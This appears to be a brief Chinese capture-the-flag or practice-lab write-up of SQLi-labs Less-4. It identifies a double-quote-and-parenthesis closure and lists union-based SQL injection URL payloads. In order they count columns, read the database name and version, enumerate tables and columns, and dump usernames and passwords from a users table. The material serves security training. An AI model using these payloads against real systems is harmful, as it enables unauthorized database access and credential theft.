less4
首先判断闭合类型。

为双引号括号类型闭合。
然后后面的和前面的是一样的。
附个码
?id=1\
?id=1") order by 3--+
?id=1") order by 4--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username,password) from users--+

浙公网安备 33010602011771号